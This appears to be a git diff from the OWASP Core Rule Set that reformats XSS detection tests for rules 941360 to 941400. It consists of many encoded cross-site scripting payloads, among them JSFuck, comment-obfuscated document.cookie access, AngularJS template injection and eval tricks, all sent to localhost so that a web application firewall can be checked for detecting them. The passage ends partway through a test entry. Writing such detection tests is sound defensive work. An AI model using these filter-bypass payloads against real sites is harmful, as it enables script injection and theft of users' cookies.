"a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" - # Payload represents "alert(1)" in JSFuck encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - test_title: 941360-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" + # Payload represents "alert(1)" in JSFuck encoding + version: HTTP/1.1 + output: + log: + expect_ids: [941360] + - test_id: 2 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=(![]+[])[+!+[]]" - # Payload represents "a" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - test_title: 941360-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=(![]+[])[+!+[]]" + # Payload represents "a" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log: + expect_ids: [941360] + - test_id: 3 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=+!![]" - # Payload represents "1" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=+!![]" + # Payload represents "1" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log: + expect_ids: [941360] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml index 4057795..ca9246a 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml @@ -1,177 +1,175 @@ --- meta: author: "Andrea Menin, azurit" - description: None - enabled: true - name: 941370.yaml +rule_id: 941370 tests: - - test_title: 941370-1 + - test_id: 1 desc: "Bypass using comment in syntax and multiple whitespaces" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 2 desc: "Bypass using comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 3 desc: "Bypass using JavaScript global variables" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 4 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 5 desc: "Bypass using JavaScript global variables and string concatenation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 6 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 7 desc: "Bypass using JavaScript global variables and jQuery globalEval" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 8 desc: "Bypass using JavaScript global variables and hex escape sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%22%5Cx24%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%22%5Cx24%22%5D" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 9 desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=%28document%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=%28document%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 10 desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index de766fa..5b4a9f5 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml @@ -1,24 +1,22 @@ --- meta: author: "Franziska Buehler, azurit" - description: None - enabled: true - name: 941380.yaml +rule_id: 941380 tests: - - test_title: 941380-1 + - test_id: 1 desc: "AngularJS client side template injection detection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff" - # /login?user={{constructor.constructor('alert(1)')()}} - version: HTTP/1.1 - output: - log_contains: id "941380" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff" + # /login?user={{constructor.constructor('alert(1)')()}} + version: HTTP/1.1 + output: + log: + expect_ids: [941380] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml index b412b74..0de1e92 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml @@ -1,151 +1,149 @@ --- meta: author: "Franziska Buehler, Xhoenix, azurit" - description: None - enabled: true - name: 941390.yaml +rule_id: 941390 tests: - - test_title: 941390-1 + - test_id: 1 desc: "JavaScript method setInterval(code, 1)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=setInterval%28code%2C%201%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=setInterval%28code%2C%201%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 2 desc: "JavaScript method: arg=x\";setTimeout(name, 1)//" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 3 desc: "JavaScript method eval('2 + 2')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=eval%28%272%20%2B%202%27%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=eval%28%272%20%2B%202%27%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 4 desc: "JavaScript constructor new Function()" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=new%20Function%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=new%20Function%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 5 desc: "JavaScript call alert" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=alert%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=alert%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 6 desc: "JavaScript call atob" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=atob%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=atob%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 7 desc: "JavaScript call btoa" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=btoa%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=btoa%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 8 desc: "JavaScript call prompt" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=prompt%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=prompt%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 9 desc: "JavaScript call confirm" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=confirm%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=confirm%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml index ddecdfe..12cc969 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml @@ -1,119 +1,117 @@ --- meta: author: "Andrea Menin, azurit" - description: None - enabled: true - name: 941400.yaml +rule_id: 941400 tests: - - test_title: 941400-1 + - test_id: 1 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 2 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 3 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 4 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 5 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 